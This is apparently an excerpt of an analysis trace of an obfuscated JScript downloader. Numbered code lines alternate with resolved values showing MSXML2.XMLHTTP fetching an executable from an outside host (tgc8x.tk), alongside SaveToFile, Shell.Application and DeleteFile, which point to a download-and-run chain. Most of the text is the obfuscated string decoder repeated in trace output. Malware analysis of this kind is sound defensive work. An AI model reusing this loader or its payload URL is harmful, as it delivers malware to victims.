                                                                                                                                                                                                                                                              Object[_0x115fc7 ( 0x75 ) ] ( _0x155c25 ( 0x8b, 'QaXE' ), _0x115fc7 ( 0x84 ), ! [] ), Object[_0x115fc7 ( 0x74 ) ] ( );
                                                                                                                                                                                                                                                              • _0x1c3e(117) ➔ "Open"
                                                                                                                                                                                                                                                              • _0x155c25(139,"QaXE") ➔ "GET"
                                                                                                                                                                                                                                                              • _0x115fc7(132) ➔ "https://tgc8x.tk/tt/VNZVNCXKKJSF.exe"
                                                                                                                                                                                                                                                              • Open("GET","https://tgc8x.tk/tt/VNZVNCXKKJSF.exe",false) ➔ undefined
                                                                                                                                                                                                                                                              • _0x115fc7(116) ➔ "Send"
                                                                                                                                                                                                                                                              • Send() ➔ undefined
                                                                                                                                                                                                                                                              95
                                                                                                                                                                                                                                                              function _0x5b6c(_0x573185, _0x30822b) {
                                                                                                                                                                                                                                                              • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                                              • _0x5b6c(122,"m*X5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02"
                                                                                                                                                                                                                                                              • _0x5b6c(123,"RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki"
                                                                                                                                                                                                                                                              • _0x5b6c(141,"W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1"
                                                                                                                                                                                                                                                              • _0x5b6c(129,"4(*W") ➔ undefined
                                                                                                                                                                                                                                                              • _0x5b6c(122,"m*X5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc"
                                                                                                                                                                                                                                                              • _0x5b6c(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                                              • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                                              • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                                              • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                                              96
                                                                                                                                                                                                                                                              var _0x3d4abd = _0x4a61 ( );
                                                                                                                                                                                                                                                              • _0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD
                                                                                                                                                                                                                                                              • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                                                              • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                                                              • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                                                              • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                                                              • _0x4a61() ➔ DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open
                                                                                                                                                                                                                                                              • _0x4a61() ➔ DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open
                                                                                                                                                                                                                                                              • _0x4a61() ➔ ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile
                                                                                                                                                                                                                                                              • _0x4a61() ➔ 428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW
                                                                                                                                                                                                                                                              • _0x4a61() ➔ uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq
                                                                                                                                                                                                                                                              97
                                                                                                                                                                                                                                                              return _0x5b6c =
                                                                                                                                                                                                                                                                98
                                                                                                                                                                                                                                                                function (_0x10ff05, _0x54c045) {
                                                                                                                                                                                                                                                                • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                                                • _0x5b6c(122,"m*X5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02"
                                                                                                                                                                                                                                                                • _0x5b6c(123,"RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki"
                                                                                                                                                                                                                                                                • _0x5b6c(141,"W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1"
                                                                                                                                                                                                                                                                • _0x5b6c(129,"4(*W") ➔ undefined
                                                                                                                                                                                                                                                                • _0x5b6c(122,"m*X5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc"
                                                                                                                                                                                                                                                                • _0x5b6c(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                                                • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                                                • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                                                • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                                                99
                                                                                                                                                                                                                                                                var _0x21482c = _0x5099, _0x562b2c = _0xe99d;
                                                                                                                                                                                                                                                                  100
                                                                                                                                                                                                                                                                  _0x10ff05 = _0x10ff05 - 0x6e;
                                                                                                                                                                                                                                                                    101
                                                                                                                                                                                                                                                                    var _0x325444 = _0x3d4abd[_0x10ff05];
                                                                                                                                                                                                                                                                      102
                                                                                                                                                                                                                                                                      if ( _0x5b6c[_0x562b2c ( 0xe3 ) ] === undefined )
                                                                                                                                                                                                                                                                      • _0x562b2c(227) ➔ "qCVKfY"
                                                                                                                                                                                                                                                                      • _0x562b2c(227) ➔ "qCVKfY"
                                                                                                                                                                                                                                                                      • _0x562b2c(227) ➔ "qCVKfY"
                                                                                                                                                                                                                                                                      • _0x562b2c(227) ➔ "qCVKfY"
                                                                                                                                                                                                                                                                      • _0x562b2c(227) ➔ "qCVKfY"
                                                                                                                                                                                                                                                                      • _0x562b2c(227) ➔ "qCVKfY"
                                                                                                                                                                                                                                                                      • _0x562b2c(227) ➔ "qCVKfY"
                                                                                                                                                                                                                                                                      • _0x562b2c(227) ➔ "qCVKfY"
                                                                                                                                                                                                                                                                      • _0x562b2c(227) ➔ "qCVKfY"
                                                                                                                                                                                                                                                                      • _0x562b2c(227) ➔ "qCVKfY"
                                                                                                                                                                                                                                                                      103
                                                                                                                                                                                                                                                                      {
                                                                                                                                                                                                                                                                        104
                                                                                                                                                                                                                                                                        var _0x1c1988 = function (_0x985f2d) {
                                                                                                                                                                                                                                                                        • _0x1c1988("279BGVghm") ➔ undefined
                                                                                                                                                                                                                                                                        • _0x1c1988("vcFcV8kjWRZdHmk4WROea0xcUa") ➔ "T'\xbf\x89\xbc\xc4\xb8\xba\x04\x03E\xb8"
                                                                                                                                                                                                                                                                        • _0x1c1988("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                                                                                                                                                        • _0x1c1988("W4BcLCo0oJRcS8kdW4SaWO1/WQaN") ➔ "\xc6\x95\xf4::\xb3\x83\xcb\x00\x8d\x7f\xa0'"
                                                                                                                                                                                                                                                                        • _0x1c1988("Type") ➔ undefined
                                                                                                                                                                                                                                                                        • _0x1c1988("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                                                                                                                                                        • _0x1c1988("Scripting.FileSystemObject") ➔ undefined
                                                                                                                                                                                                                                                                        • _0x1c1988("Scripting.FileSystemObject") ➔ undefined
                                                                                                                                                                                                                                                                        • _0x1c1988("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe") ➔ undefined
                                                                                                                                                                                                                                                                        • _0x1c1988("995898DfgeKn") ➔ undefined
                                                                                                                                                                                                                                                                        105
                                                                                                                                                                                                                                                                        var _0x14c45f = _0x5099, _0x1315bc = _0x562b2c, _0x2441a2 = _0x1315bc ( 0xd2 ), _0x5162e5 = '', _0x2d3365 = '';
                                                                                                                                                                                                                                                                        • _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                                                                                        • _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                                                                                        • _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                                                                                        • _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                                                                                        • _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                                                                                        • _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                                                                                        • _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                                                                                        • _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                                                                                        • _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                                                                                        • _0x1315bc(210) ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                                                                                        106
                                                                                                                                                                                                                                                                        for ( var _0xc99301 = 0x0, _0x2a3829, _0x20589b, _0x13f1ea = 0x0 ; _0x20589b = _0x985f2d[_0x14c45f ( 0xfb, 'cLA8' ) ] ( _0x13f1ea ++ ) ; ~ _0x20589b && ( _0x2a3829 = _0xc99301 % 0x4 ? _0x2a3829 * 0x40 + _0x20589b : _0x20589b, _0xc99301 ++ % 0x4 ) ? _0x5162e5 += String[_0x1315bc ( 0xdc ) ] ( 0xff & _0x2a3829 >> ( - 0x2 * _0xc99301 & 0x6 ) ) : 0x0 )
                                                                                                                                                                                                                                                                        • _0x14c45f(251,"cLA8") ➔ "charAt"
                                                                                                                                                                                                                                                                        • _0x14c45f(251,"cLA8") ➔ "charAt"
                                                                                                                                                                                                                                                                        • _0x1315bc(220) ➔ "fromCharCode"
                                                                                                                                                                                                                                                                        • _0x14c45f(251,"cLA8") ➔ "charAt"
                                                                                                                                                                                                                                                                        • _0x1315bc(220) ➔ "fromCharCode"
                                                                                                                                                                                                                                                                        • _0x14c45f(251,"cLA8") ➔ "charAt"
                                                                                                                                                                                                                                                                        • _0x1315bc(220) ➔ "fromCharCode"
                                                                                                                                                                                                                                                                        • _0x14c45f(251,"cLA8") ➔ "charAt"
                                                                                                                                                                                                                                                                        • _0x14c45f(251,"cLA8") ➔ "charAt"
                                                                                                                                                                                                                                                                        • _0x1315bc(220) ➔ "fromCharCode"
                                                                                                                                                                                                                                                                        • _0x14c45f(251,"cLA8") ➔ "charAt"
                                                                                                                                                                                                                                                                        • _0x1315bc(220) ➔ "fromCharCode"
                                                                                                                                                                                                                                                                        • _0x14c45f(251,"cLA8") ➔ "charAt"
                                                                                                                                                                                                                                                                        • _0x1315bc(220) ➔ "fromCharCode"
                                                                                                                                                                                                                                                                        • _0x14c45f(251,"cLA8") ➔ "charAt"
                                                                                                                                                                                                                                                                        • _0x14c45f(251,"cLA8") ➔ "charAt"
                                                                                                                                                                                                                                                                        • _0x1315bc(220) ➔ "fromCharCode"
                                                                                                                                                                                                                                                                        • _0x1315bc(220) ➔ "fromCharCode"
                                                                                                                                                                                                                                                                        • _0x1315bc(220) ➔ "fromCharCode"
                                                                                                                                                                                                                                                                        • _0x1315bc(220) ➔ "fromCharCode"
                                                                                                                                                                                                                                                                        107
                                                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                                                          108
                                                                                                                                                                                                                                                                          _0x20589b = _0x2441a2['indexOf'] ( _0x20589b );
                                                                                                                                                                                                                                                                            109
                                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                                              110
                                                                                                                                                                                                                                                                              for ( var _0x52a501 = 0x0, _0xd68c99 = _0x5162e5[_0x1315bc ( 0xdf ) ] ; _0x52a501 < _0xd68c99 ; _0x52a501 ++ )
                                                                                                                                                                                                                                                                              • _0x1315bc(223) ➔ "length"
                                                                                                                                                                                                                                                                              • _0x1315bc(223) ➔ "length"
                                                                                                                                                                                                                                                                              • _0x1315bc(223) ➔ "length"
                                                                                                                                                                                                                                                                              • _0x1315bc(223) ➔ "length"
                                                                                                                                                                                                                                                                              • _0x1315bc(223) ➔ "length"
                                                                                                                                                                                                                                                                              • _0x1315bc(223) ➔ "length"
                                                                                                                                                                                                                                                                              • _0x1315bc(223) ➔ "length"
                                                                                                                                                                                                                                                                              • _0x1315bc(223) ➔ "length"
                                                                                                                                                                                                                                                                              • _0x1315bc(223) ➔ "length"
                                                                                                                                                                                                                                                                              • _0x1315bc(223) ➔ "length"
                                                                                                                                                                                                                                                                              111
                                                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                                                                112
                                                                                                                                                                                                                                                                                _0x2d3365 += '%' + ( '00' + _0x5162e5[_0x1315bc ( 0x100 ) ] ( _0x52a501 ) [_0x1315bc ( 0xc8 ) ] ( 0x10 ) )['slice'] ( - 0x2 );
                                                                                                                                                                                                                                                                                • _0x1315bc(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                • _0x1315bc(200) ➔ "toString"
                                                                                                                                                                                                                                                                                • _0x1315bc(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                • _0x1315bc(200) ➔ "toString"
                                                                                                                                                                                                                                                                                • _0x1315bc(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                • _0x1315bc(200) ➔ "toString"
                                                                                                                                                                                                                                                                                • _0x1315bc(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                • _0x1315bc(200) ➔ "toString"
                                                                                                                                                                                                                                                                                • _0x1315bc(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                • _0x1315bc(200) ➔ "toString"
                                                                                                                                                                                                                                                                                • _0x1315bc(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                • _0x1315bc(200) ➔ "toString"
                                                                                                                                                                                                                                                                                • _0x1315bc(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                • _0x1315bc(200) ➔ "toString"
                                                                                                                                                                                                                                                                                • _0x1315bc(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                • _0x1315bc(200) ➔ "toString"
                                                                                                                                                                                                                                                                                • _0x1315bc(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                • _0x1315bc(200) ➔ "toString"
                                                                                                                                                                                                                                                                                • _0x1315bc(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                • _0x1315bc(200) ➔ "toString"
                                                                                                                                                                                                                                                                                113
                                                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                                                  114
                                                                                                                                                                                                                                                                                  return decodeURIComponent ( _0x2d3365 );
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%db%bf%5b%82%f1%87") ➔ undefined
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%54%27%c2%bf%c2%89%c2%bc%c3%84%c2%b8%c2%ba%04%03%45%c2%b8") ➔ "T'\xbf\x89\xbc\xc4\xb8\xba\x04\x03E\xb8"
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%c2%8c%c2%85%c2%95%29%c3%be%c2%8c%73%35%45%c2%92%40%66") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%c3%86%c2%95%c3%b4%3a%3a%c2%b3%c2%83%c3%8b%00%c2%8d%7f%c2%a0%27") ➔ "\xc6\x95\xf4::\xb3\x83\xcb\x00\x8d\x7f\xa0'"
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%b5%83%c4") ➔ undefined
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%c2%8c%c2%85%c2%95%29%c3%be%c2%8c%73%35%45%c2%92%40%66") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%b0%24%48%3d%32%0d%19%f2%0b%12%c6%12%4c%43%28%04%91%02") ➔ undefined
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%b0%24%48%3d%32%0d%19%f2%0b%12%c6%12%4c%43%28%04%91%02") ➔ undefined
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%1d%34%cf%4b%ff%d3%18%2f%17%4c%af%d3%4f%fb%e7%ce%f9%dc%c6%49%23%b1%f1%17") ➔ undefined
                                                                                                                                                                                                                                                                                  • decodeURIComponent("%f7%de%7c%f7%c7%45%18%49%0d") ➔ undefined
                                                                                                                                                                                                                                                                                  115
                                                                                                                                                                                                                                                                                  },
                                                                                                                                                                                                                                                                                    116
                                                                                                                                                                                                                                                                                    _0x229c24 = function (_0x29b9bf, _0x8f1407) {
                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("279BGVghm","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("vcFcV8kjWRZdHmk4WROea0xcUa","m*X5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02"
                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("WOZcHCkvkCo+WOXZnuxcKKbM","RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki"
                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("W4BcLCo0oJRcS8kdW4SaWO1/WQaN","W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1"
                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("Type","4(*W") ➔ undefined
                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("WOZcHCkvkCo+WOXZnuxcKKbM","m*X5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc"
                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("Scripting.FileSystemObject","RY1%") ➔ undefined
                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("Scripting.FileSystemObject","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("995898DfgeKn","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                    117
                                                                                                                                                                                                                                                                                    var _0x4eb5d1 = _0x562b2c, _0x3fff08 = _0x5099, _0x540d16 = [], _0x7b0d9d = 0x0, _0x582129, _0x19cf9c = '';
                                                                                                                                                                                                                                                                                      118
                                                                                                                                                                                                                                                                                      _0x29b9bf = _0x1c1988 ( _0x29b9bf );
